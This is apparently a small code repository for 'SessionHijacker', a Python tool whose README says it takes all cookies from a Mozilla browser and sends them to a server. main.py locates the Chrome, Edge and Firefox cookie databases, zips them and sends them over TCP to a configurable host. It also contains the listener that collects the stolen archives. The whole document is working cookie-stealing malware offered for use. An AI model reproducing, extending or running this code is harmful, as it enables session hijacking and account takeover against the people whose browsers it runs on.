├── README.md ├── main.py ├── .gitignore └── LICENSE /README.md: -------------------------------------------------------------------------------- 1 | # SessionHijacker 2 | A Hijacker that is able to take all Cookies from A Mozilla Webbrowser and than sends it to the responding Server. 3 | 4 | ## Usage 5 | ```bash 6 | python3 SessionHijacker.py 7 | ``` 8 | You must prev. enter your port and ip address. 9 | 10 | - enter if client or Server 11 | 12 | TODO: 13 | - find Chrome and Edge Cookie-File Path 14 | - add more Browsers 15 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | import io 2 | import os 3 | import socket 4 | import threading 5 | import zipfile 6 | from pathlib import Path 7 | 8 | 9 | def find_cookies_files(): 10 | """ 11 | Find the paths to the cookies files for Chrome, Edge, and Firefox. 12 | 13 | :return: A dictionary containing the paths to the cookies files for each browser. 14 | :rtype: dict 15 | """ 16 | cookies_files = dict() 17 | 18 | # Get the user's home directory 19 | home = Path.home() 20 | print(f"Home directory: {home}") 21 | 22 | # Chrome 23 | chrome_cookies_path = home / "AppData" / "Local" / "Google" / "Chrome" / "User Data" / "Default" / "Cookies" 24 | if chrome_cookies_path.exists(): 25 | print(f"Chrome cookies file found: {chrome_cookies_path}") 26 | cookies_files["chrome"] = chrome_cookies_path 27 | 28 | # Edge 29 | edge_cookies_path = home / "AppData" / "Local" / "Microsoft" / "Edge" / "User Data" / "Default" / "Cookies" 30 | if edge_cookies_path.exists(): 31 | print(f"Edge cookies file found: {edge_cookies_path}") 32 | cookies_files["edge"] = edge_cookies_path 33 | 34 | # Firefox 35 | firefox_profiles_path = home / "AppData" / "Roaming" / "Mozilla" / "Firefox" / "Profiles" 36 | if firefox_profiles_path.exists(): 37 | cookies_file_list = [] 38 | print(f"Firefox profiles folder found: {firefox_profiles_path}") 39 | for profile_folder in firefox_profiles_path.iterdir(): 40 | firefox_cookies_path = profile_folder / "cookies.sqlite" 41 | if firefox_cookies_path.exists(): 42 | print(f"Firefox cookies file found: {firefox_cookies_path}") 43 | cookies_file_list.append(firefox_cookies_path) 44 | cookies_files["firefox"] = cookies_file_list 45 | 46 | return cookies_files 47 | 48 | 49 | def handle_client(client_socket, file_folder): 50 | """ 51 | :param client_socket: The socket object representing the client connection. 52 | :param file_folder: The path of the folder where the received file will be saved. 53 | :return: None 54 | 55 | This method handles the communication with a client, receiving a file over the network and saving it to the specified folder. 56 | It expects the client to send the file type as "ZIPFILE" and the size of the ZIP file in bytes. 57 | 58 | If the received file type is not "ZIPFILE", an error message is printed and the method returns without saving the file. 59 | 60 | The received ZIP file is saved to the specified folder by reading blocks of data from the client socket and writing them to the file. 61 | The size of each block is 1024 bytes or the remaining size of the file, whichever is smaller, to optimize memory usage. 62 | 63 | After the file is received and saved, the client socket is closed and a message is printed indicating successful completion. 64 | """ 65 | try: 66 | with client_socket: 67 | # Empfangen des Dateityps (7 Bytes für "ZIPFILE") 68 | file_type_data = client_socket.recv(7).decode('utf-8') 69 | 70 | if file_type_data != "ZIPFILE": 71 | print("Unexpected file type received") 72 | return 73 | 74 | # Empfangen der Größe der ZIP-Datei 75 | zip_size_data = client_socket.recv(8) 76 | zip_size = int.from_bytes(zip_size_data, byteorder="big") 77 | 78 | # Empfangen der ZIP-Datei 79 | 80 | with open(file_folder, "wb") as file: 81 | remaining_size = zip_size 82 | while remaining_size > 0: 83 | data = client_socket.recv(min(1024, remaining_size)) 84 | if not data: 85 | break 86 | file.write(data) 87 | remaining_size -= len(data) 88 | finally: 89 | client_socket.close() 90 | print("Client connection closed. All data received.") 91 | 92 | 93 | def find_next_file(folder): 94 | """ 95 | Find the next file in the given folder. 96 | 97 | :param folder: The folder in which to search for the next file. 98 | :type folder: str 99 | 100 | :return: The path of the next file. 101 | :rtype: str 102 | 103 | Usage: 104 | >>> find_next_file('/path/to/folder') 105 | '/path/to/folder/received_data1.zip' 106 | """ 107 | i = 1 108 | while True: 109 | file = folder / f"received_data{i}.zip" 110 | if not file.exists(): 111 | # create the file 112 | file.touch() 113 | return file 114 | i += 1 115 | 116 | 117 | # Server-Teil 118 | def start_server(): 119 | """ 120 | Starts the server and listens for incoming connections. 121 | 122 | :return: None 123 | """ 124 | server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 125 | server_socket.bind(('localhost', 12345)) 126 | server_socket.listen() 127 | 128 | print("Server is waiting for connections...") 129 | try: 130 | while True: 131 | client_socket, _ = server_socket.accept() 132 | 133 | print(f"New connection received.") 134 | folder = Path.home() / "cookie_folder" 135 | if not os.path.exists(folder): 136 | os.makedirs(folder, exist_ok=True) 137 | file = find_next_file(folder) 138 | client_thread = threading.Thread(target=handle_client, args=(client_socket, file)) 139 | client_thread.start() 140 | except KeyboardInterrupt: 141 | print("Shutting down the server...") 142 | finally: 143 | server_socket.close() 144 | 145 | 146 | # Include the previous find_cookies_files function 147 | 148 | def zip_cookies_folder(data_dict): 149 | """ 150 | 151 | **zip_cookies_folder(data_dict)** 152 | 153 | This method takes a dictionary as input, where the keys represent folder names and the values represent the paths or lists of paths to be included in the zip file. 154 | 155 | The method creates a BytesIO object to store the zipped contents of the specified folder(s). It then iterates over the keys and values of the given dictionary, checking the type of each 156 | * value and adding the corresponding files or directories to the zip file. 157 | 158 | If a value is a single path, it checks whether it represents a file or a directory. If it is a directory, it adds all files from that directory to the zip file. If it is a file, it adds 159 | * that file to the zip file. 160 | 161 | If a value is a list of paths, it checks each path in the list and adds the corresponding files or directories to the zip file. 162 | 163 | If a value is neither a single path nor a list of paths, it prints an error message indicating that an invalid value has been provided. 164 | 165 | Finally, the zipped contents are stored in the BytesIO object, which is then returned as the result of the method. 166 | 167 | Example usage: 168 | 169 | ```python 170 | data_dict = { 171 | "folder1": "/path/to/folder1", 172 | "folder2": ["/path/to/folder2", "/path/to/folder3"] 173 | } 174 | 175 | zip_buffer = zip_cookies_folder(data_dict) 176 | ``` 177 | 178 | In the example above, the method `zip_cookies_folder` is called with a dictionary containing two folder names and their corresponding paths or lists of paths. The method returns a Bytes 179 | *IO object containing the zipped contents of the specified folders.""" 180 | zip_buffer = io.BytesIO() 181 | 182 | with zipfile.ZipFile(zip_buffer, "w", zipfile.ZIP_DEFLATED) as zip_file: 183 | for folder_name, path_or_paths in data_dict.items(): 184 | print("folder_name: " + folder_name) 185 | if isinstance(path_or_paths, Path): 186 | if path_or_paths.is_dir(): 187 | # Add all files from the directory 188 | for file_path in path_or_paths.iterdir(): 189 | if file_path.is_file(): 190 | arcname = os.path.join(folder_name, file_path.name) 191 | zip_file.write(file_path, arcname) 192 | elif path_or_paths.is_file(): 193 | # Add single file 194 | arcname = os.path.join(folder_name, path_or_paths.name) 195 | zip_file.write(path_or_paths, arcname) 196 | elif isinstance(path_or_paths, list): 197 | print("decompressing list") 198 | # Process list of paths 199 | for path in path_or_paths: 200 | if path.is_dir(): 201 | print("found directory: " + str(path)) 202 | # Add all files from the directory 203 | for file_path in path.iterdir(): 204 | if file_path.is_file(): 205 | arcname = os.path.join(folder_name, file_path.name) 206 | zip_file.write(file_path, arcname) 207 | elif path.is_file(): 208 | print("found file: " + str(path)) 209 | # Add single file 210 | arcname = os.path.join(folder_name, path.name) 211 | zip_file.write(path, arcname) 212 | else: 213 | print(f"Invalid path or paths for folder {folder_name}: {type(path_or_paths)}") 214 | 215 | zip_buffer.seek(0) 216 | return zip_buffer 217 | 218 | 219 | def send_cookies_folder_to_server(server_host, server_port, cookies_folder_path): 220 | """ 221 | Sends a cookies folder to a server using a TCP socket connection. 222 | 223 | :param server_host: The hostname or IP address of the server. 224 | :param server_port: The port number on which the server is listening. 225 | :param cookies_folder_path: The path to the cookies folder that needs to be sent. 226 | 227 | :return: None 228 | """ 229 | zip_buffer = zip_cookies_folder(cookies_folder_path) 230 | 231 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client_socket: 232 | client_socket.connect((server_host, server_port)) 233 | 234 | # Senden der Nachricht, dass die folgenden Daten eine ZIP-Datei sind 235 | file_type_message = "ZIPFILE" # 7 Zeichen lang 236 | client_socket.sendall(file_type_message.encode('utf-8')) 237 | 238 | # Senden der Größe der ZIP-Datei 239 | zip_size = zip_buffer.getbuffer().nbytes 240 | client_socket.sendall(zip_size.to_bytes(8, byteorder="big")) 241 | 242 | # Senden der ZIP-Datei 243 | client_socket.sendall(zip_buffer.getvalue()) 244 | print("Cookies folder sent to the server.") 245 | 246 | 247 | def client_main_folder_finder(): 248 | """ 249 | client_main_folder_finder() 250 | 251 | This method finds the cookies files, chooses the folder of the first cookies file found (only firefox), and sends it to the server. 252 | 253 | :return: None 254 | """ 255 | cookies_files_list = find_cookies_files() 256 | # Choose the folder of the first cookies file found only firefox possible 257 | if(len(cookies_files_list) > 0): 258 | server_host = "localhost" # Replace with the server's IP address 259 | server_port = 12345 # Replace with the server's port number 260 | 261 | print(cookies_files_list) 262 | send_cookies_folder_to_server(server_host, server_port, cookies_files_list) 263 | 264 | else: 265 | print("No cookies folder found.") 266 | 267 | if __name__ == "__main__": 268 | mode = input("Start as (server/client): ").lower().strip() 269 | if mode == "server": 270 | start_server() 271 | elif mode == "client": 272 | client_main_folder_finder() 273 | else: 274 | print("Invalid mode selected. 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